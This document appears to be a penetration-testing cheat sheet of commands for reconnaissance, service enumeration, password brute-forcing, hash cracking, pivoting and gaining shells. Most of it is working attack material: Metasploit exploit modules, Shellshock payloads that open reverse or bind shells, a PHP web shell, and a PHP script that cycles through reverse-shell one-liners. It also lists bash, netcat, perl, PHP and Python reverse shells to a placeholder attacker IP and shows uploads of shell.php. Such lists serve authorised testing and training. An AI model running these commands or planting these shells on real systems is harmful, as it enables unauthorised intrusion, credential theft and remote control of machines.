script engagement_x.log
...
exit # when finished

$ alias ss='import ~/ss-$(date +%F_%H%M_%S).png'

$ export ip=target_ip

• Find service and version

• Find known service bugs

• Find configuration issues

• Run nmap port scan / banner grabbing

• Every error message

• Every URL path

• Every parameter to find versions/apps/bugs

• Every version exploit db

• Every version vulnerability

• User enumeration

• Password bruteforce

• Default credentals google search

$ nmap --script exploit -Pn $ip

$ host -t ns guif.re

$ host -t mx guif.re

$ for ip in $(cat list.txt); do host $ip.guif.re; done

$ for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"

$ host -l guif.re ns1.guif.re

$ dnsrecon -d guif.re -t axfr

$ host -t ns guif.re | cut -d " " -f 4 #

$ dnsenum guif.re

$ nmap guif.re --script=dns-zone-transfer -p 53

$ whois guif.re

$ nslookup guif.re

$ host -t ns guif.re

$ python theHarvester.py  -l 500 -b all -d guif.re

#!/bin/bash
nmap $1 -F                  # first, quick scan
nmap -sV -A -O -T4 -sC $1   # verify services, Os, run scripts
nmap -p 1-65535 -T5 -sT $1  # scan all ports TCP
nmap -p 1-10000 -T4 -Su $1  # UDP scan

nmap -sP 192.168.0.1/24

$ nmap -p 1-65535 -T4 -sS $ip

$ sudo nmap -sV -A -O -T4 $ip

$ nmap -nvv -w 1 IP 22-8

$ nmap -nvv -sU -w 1 $ip 22-81

$ arp-scan 10.10.10.1/28 -I eth0

$ sudo nmap -sn -oA nmap_pingscan 10.10.10.1/24

$ nmap -sS -F -oA nmap_fastscan 10.10.10.1/24

$ nmap -sV $ip

$ nmap -sC $ip

$ nmap -Pn -sV -O -pT:{TCP ports found},U:{UDP ports found} --script *vuln* $ip

$ nmap -Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 -oA /root/192_168_15_201T 192.168.15.201

$ mkdir /usr/share/nmap/scripts/vulnscan; cd /usr/share/nmap/scripts/vulnscan; git clone https://github.com/scipag/vulscan.git; nmap -sS -sV --script=/usr/share/nmap/scripts/vulnscan/vulscan.nse $ip

$ amap -d $ip <port>

$ nmblookup -A $ip

$ enum4linux -a $ip

$ nbtscan -r $ip

msfconsole; use scanner/smb/smb_version; set RHOSTS $ip; run

msfconsole; use exploit/multi/samba/usermap_script; set lhost 192.168.0.X; set rhost $ip; run

$ nmap --script=smb-enum* --script-args=unsafe=1 -T5 $ip

$ nmap --script=smb-vuln* --script-args=unsafe=1 -T5 $ip

$ nmap --script=smb2-capabilities,smb-print-text,smb2-security-mode.nse,smb-protocols,smb2-time.nse,smb-psexec,smb2-vuln-uptime,smb-security-mode,smb-server-stats,smb-double-pulsar-backdoor,smb-system-info,smb-vuln-conficker,smb-enum-groups,smb-vuln-cve2009-3103,smb-enum-processes,smb-vuln-cve-2017-7494,smb-vuln-ms06-025,smb-enum-shares,smb-vuln-ms07-029,smb-enum-users,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-ls,smb-vuln-ms10-061,smb-vuln-ms17-010,smb-os-discovery --script-args=unsafe=1 -T5 $ip

$ nmap -p139,445 -T4 -oN smb_vulns.txt -Pn --script 'not brute and not dos and smb-*' -vv -d $ip

$ smbclient //$ip/share -U username

$ smbclient //$ip/share # hit enter with blank password

$ hydra -l administrator -P /usr/share/wordlists/rockyou.txt -t 1 $ip smb

>  set SMBDirect false

$ nmap -Pn -sUC -p137 $ip

$ showmount -e $ip

$ mount $ip:/vol/share /mnt/nfs

$ nikto -host $ip

$ wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web_Content/Top1000-RobotsDisallowed.txt; gobuster dir -u http://$ip -w Top1000-RobotsDisallowed.txt

$ wfuzz -c -z list.txt --sc 200 http://$ip

$ dirb $ip /usr/share/wordlists/dirb/common.txt

$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -u $ip

$ gobuster dir -u http://$ip/  -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e

$ gobuster dir -u http://$ip/ -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -s '200,204,403,500' -e

$ cd /root/dirsearch; python3 dirsearch.py  -u http://$ip/ -e .php

./whatweb $ip # identifies all known services

$ nmap --script http-methods --script-args http-methods.url-path='/test' $ip

$ hydra 10.0.0.1 http-post-form "/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid" -P /usr/share/wordlists/rockyou.txt -l admin

$ nikto -host http://$ip

$ nmap --script=http-vuln* $ip 

sqlmap -u "http://$ip/?query" --data="user=foo&pass=bar&submit=Login" --level=5 --risk=3 --dbms=mysql  

$  nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip

$ hydra -l user -P /usr/share/wordlists/rockyou.txt -f $ip http-get /path

$ davtest -move -sendbd auto -url http://$ip:8080/webdav/

$ cadaver http://$ip:8080/webdav/

$ nmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $ip -p 3306

$ nmap -sV -Pn -vv -script=mysql* $ip -p 3306

$ sqlmap -u 'http://$ip/login-off.asp' --method POST  --data 'txtLoginID=admin&txtPassword=aa&cmdSubmit=Login' --all --dump-all

mysql> select do_system('id');
mysql> \! sh

msf > use auxiliary/scanner/mssql/mssql_ping
$ nmap -sU --script=ms-sql-info $ip

msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login

msf > use exploit/windows/mssql/mssql_payload
    msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp

# root@kali:~/dirsearch# cat ../.freetds.conf
[someserver]
host = $ip
port = 1433
tds version = 8.0
user=sa

root@kali:~/dirsearch# sqsh -S someserver -U sa -P PASS -D DB_NAME

$ nmap -p6379 --script redis-info $ip

$ redis-cli -h $ip

$ nmap -p11211 --script memcached-info $ip

msf > use auxiliary/gather/memcached_extractor

smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip

>use auxiliary/scanner/smtp/smtp_enum

>VRFY root

>EXPN root

$ nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $ip

$ hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V

use auxiliary/scanner/smtp/smtp_enum

telnet $ip 25
EHLO root
MAIL FROM:root@target.com
RCPT TO:example@gmail.com
DATA
Subject: Testing open mail relay.
Testing SMTP open mail relay. Have a nice day.
.
QUIT

$ rpcinfo -p $ip

$ nmap $ip --script=msrpc-enum

msf > use exploit/windows/dcerpc/ms03_026_dcom

$ nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip

$ hydra -l user -P /usr/share/john/password.lst ftp://$ip:21

$ msfconsole -q
msf> search type:auxiliary login
msf> use auxiliary/scanner/ftp/ftp_login

$  nmap --script=ftp-* -p 21 $ip

$ tftp $ip
tftp> ls
?Invalid command
tftp> verbose
Verbose mode on.
tftp> put shell.php
Sent 3605 bytes in 0.0 seconds [inf bits/sec]

msf > use auxiliary/scanner/ssh/ssh_enumusers

$ python /usr/share/exploitdb/platforms/linux/remote/40136.py -U /usr/share/wordlists/metasploit/unix_users.txt $ip

$ hydra -v -V -l root -P password-file.txt $ip ssh


$ hydra -v -V -L user.txt -P /usr/share/wordlists/rockyou.txt -t 16 192.168.33.251 ssh

$ openssl s_client -connect $ip:443

$ nmap --script ssl-enum-ciphers -p 443 $ip

$ for community in public private manager; do snmpwalk -c $community -v1 $ip; done

$ snmpwalk -c public -v1 $ip

$ snmpenum $ip public windows.txt

$ snmpwalk -c public -v1 $ip 1.3.6.1.4.1.77.1.2.25

$ nmap -sU --open -p 16110.1.1.1-254 -oG out.txt

$ snmpwalk -c public -v1  10.1.1.1 # we need to know that there is a community called public

$ snmpwalk -c public -v 2c  10.1.1.1 # version 2
    *$ snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25 # enumerate windows users

$ snmpwalk 5c public 5v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1.2 # enumerates running processes

$ nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes $ip

$ snmp-check -t $ip -c public

$ onesixtyone -c dict.txt -i $ip

use auxiliary/scanner/snmp/cisco_config_tftp

telnet $ip 110
USER uer@$ip
PASS admin
list
retr 1

$ finger-user-enum.pl -U users.txt -t $ip

$ ncrack -vv --user administrator -P password-file.txt rdp://$ip

$ hydra -t 4  -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip

$ nmap $ip --script=msrpc-enum

msf > use exploit/windows/dcerpc/ms03_026_dcom

$ ldapsearch -h $ip -p 389 -x -b "dc=mywebsite,dc=com"

$ kerbcrack

$ nmap -p88 --script krb5-enum-users --script-args krb5-enum-users.realm=research $ip

$ Mimikatz

$ theharvester -d $ip -b google

$ whois $ip

$ recon-ng; use module; set DOMAIN $ip; run;
recon/contacts/gather/http/api/whois_pocs

recon/hosts/enum/http/web/xssed

recon/hosts/gather/http/web/google_site

recon/hosts/gather/http/web/ip_neighbor

$ searchsploit --exclude=dos -t apache 2.2.3

$ msfconsole; > search apache 2.2.3

$ nmap -v -T4 --script="*-vuln-*" $ip

• Powerful vulnerability scanner with thousands of scan checks. Setup:

$ openvas-setup; openvas-adduser; gsd

$ hash-identifier

$ john hashes.txt

$ john hashes.txt

$ john hashes.txt

$ hashcat -m 500 -a 0 -o output.txt -remove hashes.txt /usr/share/wordlists/rockyou.txt

$ john --wordlist=/usr/share/wordlists/rockyou.txt 127.0.0.1.pwdump

$ unshadow /etc/passwd /etc/shadow /tmp/combined; john --wordlist=<any word list> /tmp/combined

$ crunch 6 6 0123456789ABCDEF 5o crunch1.txt

https://crackstation.net/
http://www.cmd5.org/
http://crackhash.com/
https://hashkiller.co.uk/md5-decrypter.aspx
https://www.onlinehashcrack.com/
http://rainbowtables.it64.com/
http://www.md5online.org/

$ curl -O http://host/file

$ curl --upload-file shell.php --url http://$ip/shell.php --http1.0

$ python -m SimpleHTTPServer

$ php -S $ip:80

$ nc -nlvp 4444 > incoming.exe

use auxiliary/server/ftp
auxiliary/server/tftp

python smbserver.py WORKSPACE /dir

$ curl -T 'file' 'http://$ip'

smbclient -L 1.1.1.1 --no-pass

$ git clone https://github.com/nccgroup/shocker; cd shocker; ./shocker.py -H $ip  --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose;  ./shocker.py -H $ip  --command "/bin/cat /etc/passwd" -c /cgi-bin/admin.cgi --verbose

$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc $ip 80

$ curl -x TARGETADDRESS -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/HOSTIP/1234 0>&1" $ip/cgi-bin/status

$ ssh username@$ip '() { :;}; /bin/bash'

$ sslscan $ip:443

$ sshuttle -r root@$ip 10.10.10.0/24

$ ssh gateway_host -L local_port:remote_host:remote_port

$ ssh hop_machine -L 31337:banned_machine:22
$ ssh -p 31337 localhost

$ ssh <gateway> -R <remote port to bind>:<local host>:<local port>

$ ssh -D local_port remote_add 

 allow *_
internal IP_SAME_NETWORK
external IP_OTHER_NETWORK
socks -p1081

socks4  IP_SAME_NETWORK 1081

$ proxychains nmap -sT -Pn IP_OTHER_NETWORK-250 --top-ports=5

$ ssh -f -N -D 9050 root@10.1.2.1

socks4 127.0.0.1 9050

$ proxychains ssh -f -N -D 10050 root@10.1.2.1 -p 22

socks4 127.0.0.1 10050

$ proxychains nmap -sTV -n -PN 10.1.2.1 -254

http://www.cvedetails.com/
https://www.exploit-db.com/

/usr/share/seclists/
/usr/share/wordlist/
/usr/share/metasploit-framework/data/wordlists/

$ for i in 1 2 3 4 5 6 7; do echo -e '200 OK HTTP/1.1\r\nConnection:close\r\n\r\nfoo\r\n' |nc -q 0 -klvvp 80; done

<?php echo '<pre>'; echo shell_exec($_GET['cmd']); echo '</pre>'; ?>

/usr/share/webshells/...

/usr/share/webshells/php/php-reverse-shell.php

<?php
echo 'running shell';
$ip='YOUR_IP';
$port='YOUR_PORT';
$reverse_shells = array(
    '/bin/bash -i > /dev/tcp/'.$ip.'/'.$port.' 0<&1 2>&1',
    '0<&196;exec 196<>/dev/tcp/'.$ip.'/'.$port.'; /bin/sh <&196 >&196 2>&196',
    '/usr/bin/nc '.$ip.' '.$port.' -e /bin/bash',
    'nc.exe -nv '.$ip.' '.$port.' -e cmd.exe',
    "/usr/bin/perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"".$ip.":".$port."\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'",
    'rm -f /tmp/p; mknod /tmp/p p && telnet '.$ip.' '.$port.' 0/tmp/p',
    'perl -e \'use Socket;$i="'.$ip.'";$p='.$port.';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\''
);
foreach ($reverse_shells as $reverse_shell) {
   try {echo system($reverse_shell);} catch (Exception $e) {echo $e;}
   try {shell_exec($reverse_shell);} catch (Exception $e) {echo $e;}
   try {exec($reverse_shell);} catch (Exception $e) {echo $e;}
}
system('id');
?>

nc <attacker_ip> <port> -e /bin/bash

/bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1

0<&196;exec 196<>/dev/tcp/<attacker_ip>/<port>; sh <&196 >&196 2>&196

telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port>

php -r '$sock=fsockopen("<attacker_ip>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'

perl -e 'use Socket;$i="<attacker_ip>";$p=<port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

$ perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"ip:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker_ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

#!/usr/bin/python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("IP",port))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

http://
http://
connect://
sock4://
sock5://

$ nmap –Pn -sSV -p1723 $ip

$ cat dic.txt | thc-pptp-bruter –u admin $ip

$ ike-scan -q $iprange

$ python prober.py $ip

$ nmap --script ssl-enum-ciphers -p443

$ nmap -p443 --script ssl-cert

• The X.509 subject common name (CN) is correct for the service

• The issuer is reputable and certificate chain valid

• RSA or DSA public key values are longer than 2,048 bits

• DH public parameters are longer than 2,048 bits

• The certificate is valid and has not expired

• The certificate is signed using SHA-256

• POODLE against CBC mode ciphers within SSL 3.0

• BEAST against CBC mode ciphers via TLS 1.0

• Byte biases in RC4 ciphers across all SSL and TLS protocol versions

$ nmap -p443 --script ssl-known-key $1

$ openssl s_client -connect $ip -no_tls1_2 -fallback_scsv

$ thc-ssl-dos $ip